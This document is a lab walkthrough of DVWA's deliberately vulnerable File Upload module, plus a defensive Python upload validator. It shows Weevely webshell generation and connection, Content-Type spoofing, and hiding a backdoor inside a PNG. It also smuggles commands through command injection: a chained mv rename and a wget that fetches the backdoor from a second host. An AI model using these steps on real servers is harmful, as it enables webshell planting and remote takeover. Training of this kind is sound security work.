[DVWA Complete Guide] DVWA File Upload Lab


DVWA File Upload Lab

Normal function

Lets a user upload an image or an ordinary attachment to the server.

Low difficulty

Code analysis

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        $html .= '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    }

}
?>

The server places no restriction at all on the uploaded file (neither its name, type nor content), so a webshell can be uploaded directly.

Generating a webshell with Weevely

Besides a simple one-line PHP backdoor, Weevely can also be used to generate the backdoor:

weevely generate FancyPig file_inclusion.php

Upload this file.


Connecting to the server with Weevely

Connect with weevely:

weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig

At this point we are connected to the server as the www user and can enter shell commands.


Medium difficulty

Code analysis

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }

}
?>

As the code above shows, it restricts the uploaded file's type and size: the MIME type (the Content-Type sent by the client) must be image/jpeg or image/png, and the size must not exceed 100000 B.

Changing the file type

Change the type of the file generated earlier by Weevely to png.


Then capture the request during the upload; here the type can be seen to be png.


We can upload it by changing the .png in the file name above to .php while leaving the type field unchanged.


It reports that the upload succeeded.


Connecting to the server

Connect with weevely:

weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig

At this point we are connected to the server as the www user and can enter shell commands.


High difficulty

Code analysis

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

The Medium-level code was vulnerable because it relied on the client-supplied content-type to determine the file type. The code above checks the file extension (after the last dot) and additionally requires getimagesize() to parse the file as an image, which makes it much harder to upload a php file simply by editing the request in Burp Suite.

At this point we need to lean on other vulnerabilities in DVWA, for example the Command Injection vulnerability, to rename the file after upload and change its extension to .php.
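As an added illustration (Python, written for this article; it is not DVWA's code), the layered checks that each of the three levels above is missing: the extension is taken after the last dot, the client's Content-Type is ignored in favour of magic bytes, and a PNG must end exactly at its IEND chunk, so an image with a script appended (the cat merge used in the approaches below) is rejected even though getimagesize() would accept it. The server-chosen file name and the PHP-tag scan are assumptions of this example, not DVWA behaviour.

```python
import hashlib
import struct
import zlib

# Allowed extensions and the magic bytes each one must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
MAX_SIZE = 100000  # same limit the DVWA code uses

def png_end_offset(data):
    """Walk the PNG chunk list and return the offset just past IEND (None if malformed)."""
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            return pos
    return None

def validate_upload(filename, data):
    """Return (accepted, reason_or_server_chosen_name). The client Content-Type is ignored."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:                       # last dot wins: "x.png.php" is php
        return False, "extension not allowed"
    if len(data) >= MAX_SIZE:
        return False, "too large"
    if not data.startswith(ALLOWED[ext]):        # content must match the extension
        return False, "magic bytes do not match extension"
    if ext == "png":                             # a real PNG ends exactly at IEND
        end = png_end_offset(data)
        if end is None:
            return False, "malformed PNG"
        if end != len(data):
            return False, "trailing data after IEND"
    if b"<?php" in data or b"<?=" in data:       # heuristic only; re-encoding is the real fix
        return False, "PHP open tag inside image"
    # Never keep the user-supplied name: the server picks one (hypothetical policy).
    return True, hashlib.sha256(data).hexdigest()[:16] + "." + ext

def make_tiny_png():
    """Constructed 1x1 RGB PNG used as sample input."""
    def chunk(ctype, body):
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    return ALLOWED["png"] + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
TINY_PNG = make_tiny_png()
PHP_STUB = b"<?php /* constructed stand-in for a backdoor */ ?>"
```

Even with these checks, a rename through Command Injection would still turn an accepted image into a .php file, so the upload directory must additionally be configured so that the web server never executes scripts from it; that is a server-configuration control, not an upload-validation one.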

Approach 1: crop a very small image, merge it with the backdoor, then connect with Cknife


Creating and merging the image

Here a very small image was cropped (about the size of a single pixel block).


Then merge the two.


Upload


Using Command Injection to change the file type

ping 127.0.0.1 |mv ../../hackable/uploads/test.png ../../hackable/uploads/test.php

Then connect with Cknife; the connection succeeds.


Approach 2: crop a very small image, merge it with the backdoor, then connect with Weevely

Creating and merging the image

weevely generate FancyPig test.php
cat screenshot.png test.php >> test2.png

Upload succeeded


Using Command Injection to change the file type

ping 127.0.0.1 |mv ../../hackable/uploads/test2.png ../../hackable/uploads/test2.php

Connecting with Weevely

weevely http://192.168.47.129/dvwa/hackable/uploads/test2.php FancyPig

Approach 3: fetching the backdoor file onto the server via Command Injection


Download the test.txt file

ping 127.0.0.1 |wget http://192.168.47.128/test/test.txt

Verification shows the file has been placed on the server.


Rename test.txt to test.php

ping 127.0.0.1 |mv test.txt test.php

Verification shows the rename succeeded.


Connecting with Weevely

weevely http://192.168.47.129/dvwa/vulnerabilities/exec/test.php FancyPig